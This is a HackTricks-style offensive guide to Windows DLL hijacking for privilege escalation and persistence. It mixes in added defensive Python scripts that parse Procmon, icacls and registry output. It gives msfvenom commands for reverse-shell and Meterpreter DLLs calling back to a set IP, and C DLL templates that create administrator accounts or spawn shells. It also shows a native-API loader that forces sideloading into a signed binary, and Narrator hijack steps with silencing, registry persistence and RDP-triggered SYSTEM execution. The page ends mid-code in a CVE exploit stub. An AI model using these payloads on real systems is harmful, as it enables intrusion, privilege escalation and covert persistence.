Dll Hijacking
Reading time: 17 minutes
Tip
Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Basic Information
DLL Hijacking involves manipulating a trusted application into loading a malicious DLL. The term covers several tactics such as DLL Spoofing, Injection and Side-Loading. It is mainly used for code execution, achieving persistence and, less commonly, privilege escalation. Although the focus here is on escalation, the hijacking method stays the same regardless of the goal.
Common Techniques
Several methods are used for DLL hijacking, each with its own effectiveness depending on the application's DLL loading strategy:
- DLL Replacement: Swapping a legitimate DLL for a malicious one, optionally using DLL Proxying to preserve the original DLL's functionality.
- DLL Search Order Hijacking: Placing the malicious DLL in a search path ahead of the legitimate one, abusing the application's search pattern.
- Phantom DLL Hijacking: Creating a malicious DLL for an application to load, believing it is a required DLL that does not actually exist.
- DLL Redirection: Modifying search parameters such as %PATH% or .exe.manifest / .exe.local files to direct the application to the malicious DLL.
- WinSxS DLL Replacement: Substituting the legitimate DLL with a malicious counterpart in the WinSxS directory, a method often associated with DLL side-loading.
- Relative Path DLL Hijacking: Placing the malicious DLL in a user-controlled directory together with a copied application, resembling Binary Proxy Execution techniques.
Finding missing Dlls
The most common way to find missing Dlls on a system is to run procmon from sysinternals, set the two filters that isolate failed DLL loads, and then show only File System Activity.
If you are looking for missing dlls in general you leave this running for a few seconds.
If you are looking for a missing dll inside a specific executable you should set another filter like "Process Name" "contains" <exec name>, execute it, and stop capturing events.
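The Procmon GUI filters above are enough for a quick look, but for a defender triaging many hosts it helps to reconstruct the loader's probe sequence from a saved capture: which directories a process tried, in which order, and where the DLL was finally found (or that it never was). The following Python script is an added example, not from HackTricks; it parses the CSV format Procmon exports (the column names are Procmon's, the event rows are constructed for the example) and reports, per process and DLL, the directories probed before the successful load (where a planted copy would win) and the DLLs that were never found anywhere (phantom-DLL candidates).

```python
import csv
import io
import ntpath
from collections import defaultdict

# Constructed Procmon CSV export (File > Save... > CSV). The column names are the
# ones Procmon writes; the events themselves are made up for this example.
SAMPLE_PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"9:30:00.0000000 AM","TPQMAssistant.exe","4120","CreateFile","C:\ProgramData\Lenovo\TPQM\Assistant\hostfxr.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:30:00.0000100 AM","TPQMAssistant.exe","4120","CreateFile","C:\Windows\System32\hostfxr.dll","SUCCESS","Desired Access: Read Attributes"
"9:30:00.0000200 AM","TPQMAssistant.exe","4120","Load Image","C:\Windows\System32\hostfxr.dll","SUCCESS","Image Base: 0x7ff800000000"
"9:31:12.0000000 AM","Narrator.exe","5044","CreateFile","C:\Windows\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"9:31:12.0000300 AM","Narrator.exe","5044","CreateFile","C:\Windows\System32\en-US\Narrator.exe.mui","SUCCESS","Desired Access: Generic Read"
"9:31:15.0000000 AM","notepad.exe","1234","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read Attributes"
'''

# Procmon results that mean "nothing here": the loader moves on to the next directory.
NOT_FOUND_RESULTS = {"NAME NOT FOUND", "PATH NOT FOUND"}


def dll_probe_walk(csv_text):
    """Rebuild the search-order walk for every (process, dll) pair.

    Returns {(process, dll): {"probes": [(directory, result), ...],
                              "loaded_from": directory or None,
                              "hijack_candidates": [directories probed before the hit]}}
    built from CreateFile events whose path ends in .dll.
    """
    walks = defaultdict(list)
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "CreateFile":
            continue
        directory, filename = ntpath.split(row["Path"])
        if not filename.lower().endswith(".dll"):
            continue
        walks[(row["Process Name"], filename.lower())].append((directory, row["Result"]))

    report = {}
    for key, probes in walks.items():
        loaded_from, candidates = None, []
        for directory, result in probes:
            if result == "SUCCESS":
                loaded_from = directory      # the legitimate copy lives here
                break
            if result in NOT_FOUND_RESULTS:
                candidates.append(directory)  # searched earlier: a planted DLL here wins
        report[key] = {"probes": probes, "loaded_from": loaded_from,
                       "hijack_candidates": candidates}
    return report


def missing_dlls(report):
    """(process, dll) pairs never found in any directory: phantom-DLL candidates."""
    return sorted(k for k, v in report.items() if v["loaded_from"] is None)


if __name__ == "__main__":
    walk = dll_probe_walk(SAMPLE_PROCMON_CSV)
    for (proc, dll), info in walk.items():
        print(proc, dll, "loaded from:", info["loaded_from"],
              "probed first:", info["hijack_candidates"])
    print("never found:", missing_dlls(walk))
```

The same walk serves the two case studies later on the page: the Lenovo task's probe of its own working directory shows up as a hijack candidate ahead of the real location, and Narrator's localization DLL shows up as a DLL that is never found at all.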
Exploiting Missing Dlls
To escalate privileges, the best chance we have is to be able to write a dll that a privileged process will try to load in some place where it is going to be searched. Therefore, we will be able to write a dll in a folder where the dll is searched before the folder where the original dll is (weird case), or we will be able to write in some folder where the dll is going to be searched and the original dll doesn't exist in any folder.
Dll Search Order
In the Microsoft documentation you can find how DLLs are loaded in detail.
Windows applications look for DLLs by following a set of pre-defined search paths, in a particular sequence. The DLL hijacking problem arises when a harmful DLL is strategically placed in one of these directories, ensuring it is loaded before the legitimate DLL. The way to prevent this is to make sure the application uses absolute paths when it refers to the DLLs it needs.
You can see the DLL search order on 32-bit systems below:
- The directory from which the application loaded.
- The system directory. Use the GetSystemDirectory function to get the path of this directory. (C:\Windows\System32)
- The 16-bit system directory. There is no function that obtains the path of this directory, but it is searched. (C:\Windows\System)
- The Windows directory. Use the GetWindowsDirectory function to get the path of this directory. (C:\Windows)
- The current directory.
- The directories that are listed in the PATH environment variable. Note that this does not include the per-application path specified by the App Paths registry key. The App Paths key is not used when computing the DLL search path.
That is the default search order with SafeDllSearchMode enabled. When it is disabled the current directory moves up to second place. To disable this feature, create the HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SafeDllSearchMode registry value and set it to 0 (the default is enabled).
If LoadLibraryEx is called with LOAD_WITH_ALTERED_SEARCH_PATH the search begins in the directory of the executable module that LoadLibraryEx is loading.
Finally, note that a dll can be loaded by specifying the absolute path instead of just the name. In that case the dll is only going to be searched in that path (if the dll has any dependencies, they are going to be searched as if they were loaded by name).
There are other ways to alter the search order but I'm not going to explain them here.
Forcing sideloading via RTL_USER_PROCESS_PARAMETERS.DllPath
A more advanced way to deterministically influence the DLL search path of a newly created process is to set the DllPath field in RTL_USER_PROCESS_PARAMETERS when creating the process with ntdll's native APIs. By supplying an attacker-controlled directory here, a target process that resolves an imported DLL by name (no absolute path and without using safe loading flags) can be forced to load a malicious DLL from that directory.
Key idea
- Build the process parameters with RtlCreateProcessParametersEx and provide a custom DllPath that points to your controlled folder (e.g., the directory where your dropper/unpacker lives).
- Create the process with RtlCreateUserProcess. When the target binary resolves a DLL by name, the loader will consult this supplied DllPath during resolution, enabling reliable sideloading even when the malicious DLL is not colocated with the target EXE.
Notes/limitations
- This affects the child process being created; it is different from SetDllDirectory, which affects the current process only.
- The target must import or LoadLibrary a DLL by name (no absolute path and not using LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories).
- KnownDLLs and hardcoded absolute paths cannot be hijacked. Forwarded exports and SxS may change precedence.
Minimal C example (ntdll, wide strings, simplified error handling):
#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll.lib")

// Prototypes (not in winternl.h in older SDKs). RTL_USER_PROCESS_INFORMATION is
// not declared in winternl.h either; take its definition from a native-API header
// such as phnt if your SDK does not provide it.
typedef NTSTATUS (NTAPI *RtlCreateProcessParametersEx_t)(
    PRTL_USER_PROCESS_PARAMETERS *pProcessParameters,
    PUNICODE_STRING ImagePathName,
    PUNICODE_STRING DllPath,
    PUNICODE_STRING CurrentDirectory,
    PUNICODE_STRING CommandLine,
    PVOID Environment,
    PUNICODE_STRING WindowTitle,
    PUNICODE_STRING DesktopInfo,
    PUNICODE_STRING ShellInfo,
    PUNICODE_STRING RuntimeData,
    ULONG Flags
);

typedef NTSTATUS (NTAPI *RtlCreateUserProcess_t)(
    PUNICODE_STRING NtImagePathName,
    ULONG Attributes,
    PRTL_USER_PROCESS_PARAMETERS ProcessParameters,
    PSECURITY_DESCRIPTOR ProcessSecurityDescriptor,
    PSECURITY_DESCRIPTOR ThreadSecurityDescriptor,
    HANDLE ParentProcess,
    BOOLEAN InheritHandles,
    HANDLE DebugPort,
    HANDLE ExceptionPort,
    PRTL_USER_PROCESS_INFORMATION ProcessInformation
);

// Strip the file name from a module path, leaving its directory
static void DirFromModule(HMODULE h, wchar_t *out, DWORD cch) {
    DWORD n = GetModuleFileNameW(h, out, cch);
    for (DWORD i = n; i > 0; --i) if (out[i-1] == L'\\') { out[i-1] = 0; break; }
}

int wmain(void) {
    // Target Microsoft-signed, DLL-hijackable binary (example)
    const wchar_t *image = L"\\??\\C:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseSampleUploader.exe";

    // Build custom DllPath = directory of our current module (e.g., the unpacked archive)
    wchar_t dllDir[MAX_PATH];
    DirFromModule(GetModuleHandleW(NULL), dllDir, MAX_PATH);

    UNICODE_STRING uImage, uCmd, uDllPath, uCurDir;
    RtlInitUnicodeString(&uImage, image);
    RtlInitUnicodeString(&uCmd, L"\"C:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseSampleUploader.exe\"");
    RtlInitUnicodeString(&uDllPath, dllDir); // Attacker-controlled directory
    RtlInitUnicodeString(&uCurDir, dllDir);

    RtlCreateProcessParametersEx_t pRtlCreateProcessParametersEx =
        (RtlCreateProcessParametersEx_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlCreateProcessParametersEx");
    RtlCreateUserProcess_t pRtlCreateUserProcess =
        (RtlCreateUserProcess_t)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlCreateUserProcess");

    RTL_USER_PROCESS_PARAMETERS *pp = NULL;
    NTSTATUS st = pRtlCreateProcessParametersEx(&pp, &uImage, &uDllPath, &uCurDir, &uCmd,
                                                NULL, NULL, NULL, NULL, NULL, 0);
    if (st < 0) return 1;

    RTL_USER_PROCESS_INFORMATION pi = {0};
    st = pRtlCreateUserProcess(&uImage, 0, pp, NULL, NULL, NULL, FALSE, NULL, NULL, &pi);
    if (st < 0) return 1;

    // RtlCreateUserProcess creates the initial thread suspended: resume it,
    // then close the returned handles (not shown here)
    return 0;
}
Operational usage example
- Place a malicious xmllite.dll (exporting the required functions or proxying to the real one) in your DllPath directory.
- Launch a signed binary known to look up xmllite.dll by name using the above technique. The loader resolves the import via the supplied DllPath and sideloads your DLL.
This technique has been observed in-the-wild to drive multi-stage sideloading chains: an initial launcher drops a helper DLL, which then spawns a Microsoft-signed, hijackable binary with a custom DllPath to force loading of the attacker’s DLL from a staging directory.
Exceptions on dll search order from Windows docs
Certain exceptions to the standard DLL search order are noted in Windows documentation:
- When a DLL that shares its name with one already loaded in memory is encountered, the system bypasses the usual search. Instead, it performs a check for redirection and a manifest before defaulting to the DLL already in memory. In this scenario, the system does not conduct a search for the DLL.
- In cases where the DLL is recognized as a known DLL for the current Windows version, the system will utilize its version of the known DLL, along with any of its dependent DLLs, forgoing the search process. The registry key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs holds a list of these known DLLs.
- Should a DLL have dependencies, the search for these dependent DLLs is conducted as though they were indicated only by their module names, regardless of whether the initial DLL was identified through a full path.
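The search order above, the SafeDllSearchMode and LOAD_WITH_ALTERED_SEARCH_PATH variations, and the three exceptions just listed (already-loaded modules aside) are easy to get wrong when reasoning about whether a given load is exposed. The Python model below is an added example, not HackTricks code or Microsoft's loader; it builds the documented search order for a process, resolves a DLL reference against a constructed set of files on disk, honours the KnownDLLs and absolute-path exceptions, resolves dependencies by base name even when the parent was loaded by full path, and lists the writable directories that the loader consults before the legitimate copy. The directory names, file set and KnownDLLs subset are all constructed for the example.

```python
import ntpath


def build_search_order(app_dir, cwd, path_dirs, safe_dll_search_mode=True,
                       altered_search_base=None,
                       system_dir=r"C:\Windows\System32",
                       system16_dir=r"C:\Windows\System",
                       windows_dir=r"C:\Windows"):
    """Directories consulted, in order, for a DLL referenced by name only.

    altered_search_base models LOAD_WITH_ALTERED_SEARCH_PATH: the search starts in
    the directory of the module being loaded instead of the application directory.
    """
    first = altered_search_base or app_dir
    if safe_dll_search_mode:
        order = [first, system_dir, system16_dir, windows_dir, cwd]
    else:  # SafeDllSearchMode = 0: the current directory moves up to second place
        order = [first, cwd, system_dir, system16_dir, windows_dir]
    return order + list(path_dirs)


def resolve_dll(name, order, present_files, known_dlls, system_dir=r"C:\Windows\System32"):
    """Return (resolved_path_or_None, how) for one DLL reference.

    present_files: full paths that exist on disk (compared case-insensitively).
    known_dlls: base names listed under Session Manager\KnownDLLs; these are always
    taken from the system directory and never searched for.
    """
    present = {p.lower() for p in present_files}
    base = ntpath.basename(name).lower()
    if ntpath.isabs(name):                       # full path: that location only
        return (name if name.lower() in present else None), "absolute"
    if base in {k.lower() for k in known_dlls}:
        return ntpath.join(system_dir, base), "knowndll"
    for directory in order:
        candidate = ntpath.join(directory, base)
        if candidate.lower() in present:
            return candidate, "search"
    return None, "missing"


def hijack_exposure(name, order, present_files, known_dlls, writable_dirs):
    """Writable directories the loader consults before (or instead of) the directory
    the DLL is actually resolved from. An empty list means the search order offers
    no hijack point for this reference."""
    resolved, how = resolve_dll(name, order, present_files, known_dlls)
    if how in ("absolute", "knowndll"):
        return []
    writable = {d.lower() for d in writable_dirs}
    exposed = []
    for directory in order:
        if resolved and ntpath.dirname(resolved).lower() == directory.lower():
            break                                # the legitimate copy is found here
        if directory.lower() in writable and directory not in exposed:
            exposed.append(directory)
    return exposed


def resolve_with_dependencies(name, deps, order, present_files, known_dlls):
    """Dependencies are always resolved by base name, even when the parent DLL was
    loaded through a full path (the last exception in the list above)."""
    result = {name: resolve_dll(name, order, present_files, known_dlls)}
    for dep in deps.get(ntpath.basename(name).lower(), []):
        result[dep] = resolve_dll(dep, order, present_files, known_dlls)
    return result


# Constructed scenario: an app in C:\Apps\Tool started from a user's Downloads folder,
# with a user-writable C:\Python27 on PATH (as in the icacls example further down).
ORDER = build_search_order(r"C:\Apps\Tool", r"C:\Users\alice\Downloads",
                           [r"C:\Python27", r"C:\Windows\System32"])
ORDER_UNSAFE = build_search_order(r"C:\Apps\Tool", r"C:\Users\alice\Downloads",
                                  [r"C:\Python27", r"C:\Windows\System32"],
                                  safe_dll_search_mode=False)
PRESENT = {r"C:\Windows\System32\version.dll", r"C:\Windows\System32\kernel32.dll",
           r"C:\Python27\hostfxr.dll", r"C:\Apps\Tool\plugin.dll"}
KNOWN = {"kernel32.dll", "ntdll.dll", "user32.dll"}   # constructed subset of KnownDLLs
WRITABLE = {r"C:\Users\alice\Downloads", r"C:\Python27"}

if __name__ == "__main__":
    for dll in ("kernel32.dll", "version.dll", "hostfxr.dll", "missing.dll"):
        print(dll, resolve_dll(dll, ORDER, PRESENT, KNOWN),
              "exposed via:", hijack_exposure(dll, ORDER, PRESENT, KNOWN, WRITABLE))
```

Note what the model says about version.dll: with SafeDllSearchMode on it is only exposed if the application directory itself is writable, but with the mode disabled the writable current directory is consulted before System32. hostfxr.dll, which in this constructed layout only exists in a PATH directory, is exposed through every writable directory earlier in the order.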
Escalating Privileges
Requirements:
- Identify a process that operates or will operate under different privileges (horizontal or lateral movement), which is lacking a DLL.
- Ensure write access is available for any directory in which the DLL will be searched for. This location might be the directory of the executable or a directory within the system path.
Yes, the requirements are hard to meet because by default it is kind of weird to find a privileged executable missing a dll and it is even weirder to have write permissions on a system path folder (you can't by default). But, in misconfigured environments this is possible.
If you are lucky and find yourself meeting the requirements, you could check the UACME project. Even if the main goal of the project is to bypass UAC, you may find there a PoC of a Dll hijacking for the Windows version that you can use (probably just changing the path of the folder where you have write permissions).
Note that you can check your permissions in a folder doing:
accesschk.exe -dqv "C:\Python27"
icacls "C:\Python27"
And check the permissions of all folders inside PATH (batch-file syntax; from an interactive cmd prompt use %A instead of %%A):
for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )
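The findstr chain above is a quick grep; it also matches inherited and deny entries and anything that happens to contain "(W)". When reviewing many hosts it is worth parsing the icacls output properly. The Python below is an added example, not HackTricks code; it parses icacls output for one directory (the layout is what icacls prints, the ACEs are constructed), expands the rights flags, skips DENY entries, and reports the principals any local user holds (Everyone, Authenticated Users, BUILTIN\Users, optionally the current user) that are granted a right sufficient to create or replace a file in the folder. The principal list and the set of "write-capable" rights are the example's own assumptions.

```python
import re

# Constructed icacls output for two directories (the format is what icacls prints,
# the entries are made up for this example).
ICACLS_WEAK = r"""C:\Python27 BUILTIN\Administrators:(I)(OI)(CI)(F)
            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(M)
            BUILTIN\Users:(I)(OI)(CI)(RX)
            DESKTOP-1\alice:(OI)(CI)(W)

Successfully processed 1 files; Failed processing 0 files
"""

ICACLS_STRICT = r"""C:\Program Files\Tool BUILTIN\Administrators:(I)(OI)(CI)(F)
                    NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                    Everyone:(DENY)(W)
                    BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals that every local user effectively holds (assumption: adjust per environment).
LOW_PRIV_PRINCIPALS = {"everyone", r"nt authority\authenticated users", r"builtin\users",
                       r"nt authority\interactive"}
# Rights that let a caller create or replace a file in the folder: the simple rights
# F/M/W plus the specific rights WD (write data / add file) and AD (append data /
# add subdirectory).
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD"}

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([^)]*\))+)$")


def parse_icacls(directory, output):
    """Yield (principal, rights_set, is_deny) for each ACE in icacls output.

    The first line carries the directory path before the first ACE; continuation
    lines are indented to the same column, so the path prefix is stripped and the
    remainder is parsed uniformly.
    """
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(directory):
            line = line[len(directory):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" summary
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("rights")):
            rights.update(r.strip() for r in group.split(","))   # e.g. "(R,W,D)"
        yield m.group("principal"), rights, "DENY" in rights


def writable_by_low_priv(directory, output, current_user=None):
    """Principals (and the write-capable rights they hold) that let an unprivileged
    user drop a DLL into `directory`. DENY entries are skipped rather than evaluated
    against the allow entries, so treat a non-empty result as something to verify."""
    findings = []
    for principal, rights, is_deny in parse_icacls(directory, output):
        if is_deny:
            continue
        p = principal.lower()
        if p in LOW_PRIV_PRINCIPALS or (current_user and p == current_user.lower()):
            granted = sorted(rights & WRITE_RIGHTS)
            if granted:
                findings.append((principal, granted))
    return findings


if __name__ == "__main__":
    print(writable_by_low_priv(r"C:\Python27", ICACLS_WEAK, current_user=r"DESKTOP-1\alice"))
    print(writable_by_low_priv(r"C:\Program Files\Tool", ICACLS_STRICT))
```

In practice you would feed it the output of the loop above (one icacls call per PATH entry) and the directory string you passed to icacls, which is why the parser takes the directory as an argument instead of guessing where the path ends and the first principal begins (both may contain spaces).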
You can also check the imports of an executable and the exports of a dll with:
dumpbin /imports C:\path\Tools\putty\Putty.exe
dumpbin /exports /path/file.dll
For a full guide on how to abuse Dll Hijacking to escalate privileges with write permissions in a System Path folder check:
Writable Sys Path +Dll Hijacking Privesc
Automated tools
Winpeas will check if you have write permissions on any folder inside system PATH.
Other interesting automated tools to discover this vulnerability are the PowerSploit functions: Find-ProcessDLLHijack, Find-PathDLLHijack and Write-HijackDll.
Example
If you find an exploitable scenario, one of the most important things to exploit it successfully is to create a dll that exports at least all the functions the executable will import from it. Anyway, note that Dll Hijacking comes in handy to escalate from Medium Integrity level to High (bypassing UAC) or from High Integrity to SYSTEM. You can find an example of how to create a valid dll in this dll hijacking study focused on dll hijacking for execution: https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows.
Moreover, in the next section you can find some basic dll codes that might be useful as templates or to create a dll with non-required functions exported.
Creating and compiling Dlls
Dll Proxifying
Basically a Dll proxy is a Dll capable of executing your malicious code when loaded but also of exposing the expected interface and working as expected by relaying all the calls to the real library.
With the tools DLLirant or Spartacus you can indicate an executable and select the library you want to proxify and generate a proxified dll, or indicate the Dll and generate a proxified dll.
Meterpreter
Get rev shell (x64):
msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
Get meterpreter (x86):
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.169.0.100 LPORT=4444 -f dll -o msf.dll
Create a user (x86, I didn't see an x64 version):
msfvenom -p windows/adduser USER=privesc PASS=Attacker@123 -f dll -o msf.dll
Your own
Note that in several cases the Dll you compile must export several functions that are going to be loaded by the victim process; if these functions don't exist the binary won't be able to load them and the exploit will fail.
C DLL template (Win10)
// Tested in Win10
// i686-w64-mingw32-g++ dll.c -lws2_32 -o srrstr.dll -shared
#include <windows.h>
#include <stdlib.h>   // system()

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    switch(dwReason){
        case DLL_PROCESS_ATTACH:
            system("whoami > C:\\users\\username\\whoami.txt");
            WinExec("calc.exe", 0); // This doesn't accept redirections like system
            break;
        case DLL_PROCESS_DETACH:
            break;
        case DLL_THREAD_ATTACH:
            break;
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

C DLL template adding a user to the local administrators group
// For x64 compile with: x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll
// For x86 compile with: i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll
#include <windows.h>
#include <stdlib.h>   // system()

BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved){
    if (dwReason == DLL_PROCESS_ATTACH){
        system("cmd.exe /k net localgroup administrators user /add");
        ExitProcess(0);   // terminate the host process once the command has run
    }
    return TRUE;
}
C++ DLL example with user creation
//x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp
//x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a
#include <windows.h>
#include <cstdlib>   // exit()

int owned()
{
    // cmd.exe chains commands with "&&", not ";"
    WinExec("cmd.exe /c net user cybervaca Password01 && net localgroup administrators cybervaca /add", 0);
    exit(0);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    owned();
    return 0;
}
Alternative C DLL with a thread entry point
//Another possible DLL
// i686-w64-mingw32-gcc windows_dll.c -shared -lws2_32 -o output.dll
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

void Entry (){ // Function executed on its own thread when the DLL is loaded
    system("cmd");
}

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call){
        case DLL_PROCESS_ATTACH:
            // Run the payload on a new thread so DllMain returns promptly (loader lock)
            CreateThread(0, 0, (LPTHREAD_START_ROUTINE)Entry, 0, 0, 0);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}
Case Study: Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)
Windows Narrator.exe still probes for a predictable, language-dependent localization DLL at startup; this DLL can be hijacked to gain arbitrary code execution and persistence.
Key facts
- Probe path (current builds): %windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll (EN-US).
- Legacy path (older builds): %windir%\System32\speech\engine\tts\msttslocenus.dll.
- If an attacker-controlled, writable DLL exists at the OneCore path, it is loaded and DllMain(DLL_PROCESS_ATTACH) runs. No exports are required.
Detection with Procmon
- Filter: Process Name is Narrator.exe and Operation is Load Image or CreateFile.
- Launch Narrator and look for the load attempt of the path above.
Minimal DLL
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
#include <windows.h>

BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
    if (r == DLL_PROCESS_ATTACH) {
        // Optional OPSEC: DisableThreadLibraryCalls(h);
        // Suspend/quiet Narrator main thread, then run payload
        // (see PoC for implementation details)
    }
    return TRUE;
}
OPSEC silence
- A naive hijack will speak/highlight UI. To stay silent, on attach enumerate the Narrator threads, open the main thread (OpenThread(THREAD_SUSPEND_RESUME)) and SuspendThread it; continue in your own thread. See the PoC for full code.
Trigger and persistence via Accessibility configuration
- User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
- Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
- With the above set, starting Narrator loads the planted DLL. On the secure desktop (logon screen), press CTRL+WIN+ENTER to start Narrator.
RDP-triggered SYSTEM execution (lateral movement)
- Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
- Connect over RDP to the host; on the logon screen press CTRL+WIN+ENTER to launch Narrator; your DLL runs as SYSTEM on the secure desktop.
- Execution stops when the RDP session is closed; inject/migrate quickly.
Bring Your Own Accessibility (BYOA)
- You can copy the registry entry of a built-in Accessibility Tool (AT) (e.g., CursorIndicator), edit it to point to an arbitrary binary/DLL, import it, and then set configuration to that AT name. This allows arbitrary execution through the Accessibility framework.
Notes
- Writing under %windir%\System32 and changing HKLM values requires admin rights.
- All payload logic can live in DLL_PROCESS_ATTACH; no exports are required.
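The two registry changes that make this trigger work (an Accessibility\configuration value that auto-starts an AT on the secure desktop, and SecurityLayer set to 0 on RDP-Tcp) are also the cheapest things for a defender to audit. The Python below is an added example, not from HackTricks or the PoC; it parses `reg query` output for those keys (the layout is what reg.exe prints, the values are constructed) and flags both indicators. Which AT names are expected is environment-specific, so the check reports every configured AT and leaves the comparison against a known-good baseline to the reader.

```python
import re

# Constructed `reg query` output for the three keys the technique touches
# (HKCU and HKLM Accessibility, and the RDP-Tcp WinStation). Layout mimics
# reg.exe; the values are made up.
REG_QUERY_OUTPUT = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Accessibility
    configuration    REG_SZ    Narrator

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Accessibility
    configuration    REG_SZ

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp
    SecurityLayer    REG_DWORD    0x0
    UserAuthentication    REG_DWORD    0x1
"""

# "    <name>    <REG_TYPE>    <data>" with at least two spaces between columns;
# data is optional because an empty REG_SZ prints nothing after the type.
VALUE_RE = re.compile(r"^\s{2,}(?P<name>\S+)\s{2,}(?P<type>REG_[A-Z_]+)(?:\s{2,}(?P<data>.*))?\s*$")

ACCESSIBILITY_KEY_TAIL = r"\software\microsoft\windows nt\currentversion\accessibility"
RDP_TCP_KEY_TAIL = r"\control\terminal server\winstations\rdp-tcp"


def parse_reg_query(text):
    """Return {key_path: {value_name: (reg_type, data)}} from reg query output."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("HKEY_"):            # a key header line
            current = line.strip()
            keys[current] = {}
            continue
        m = VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group("name")] = (m.group("type"), (m.group("data") or "").strip())
    return keys


def accessibility_findings(text):
    """Flag (1) every AT named in an Accessibility\configuration value, which Windows
    starts automatically at logon / on the secure desktop, and (2) SecurityLayer=0 on
    RDP-Tcp, the classic RDP security layer the lateral-movement trigger relies on."""
    findings = []
    for key, values in parse_reg_query(text).items():
        k = key.lower()
        if k.endswith(ACCESSIBILITY_KEY_TAIL):
            _, data = values.get("configuration", ("", ""))
            for at in data.split(","):           # the value may list several ATs
                if at.strip():
                    findings.append((key, "auto-start AT: " + at.strip()))
        elif k.endswith(RDP_TCP_KEY_TAIL):
            _, data = values.get("SecurityLayer", ("", ""))
            if data and int(data, 16) == 0:
                findings.append((key, "SecurityLayer=0 (classic RDP security layer)"))
    return findings


if __name__ == "__main__":
    for key, what in accessibility_findings(REG_QUERY_OUTPUT):
        print(key, "->", what)
```

Pair the registry check with a file check of the two probe paths listed under Key facts: a DLL present there should carry a Microsoft signature, and a recently written unsigned file at either path is the on-disk half of this persistence.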
Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
This case demonstrates Phantom DLL Hijacking in Lenovo's TrackPoint Quick Menu (TPQMAssistant.exe), tracked as CVE-2025-1729.
Vulnerability Details
- Component: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
- Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask runs daily at 9:30 AM under the context of the logged-on user.
- Directory Permissions: Writable by CREATOR OWNER, allowing local users to drop arbitrary files.
- DLL Search Behavior: Attempts to load hostfxr.dll from its working directory first and logs "NAME NOT FOUND" if it is missing, indicating local directory search precedence.
Exploit Implementation
An attacker can place a malicious hostfxr.dll stub in the same directory, exploiting the missing DLL to achieve code execution under the user's context:
#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
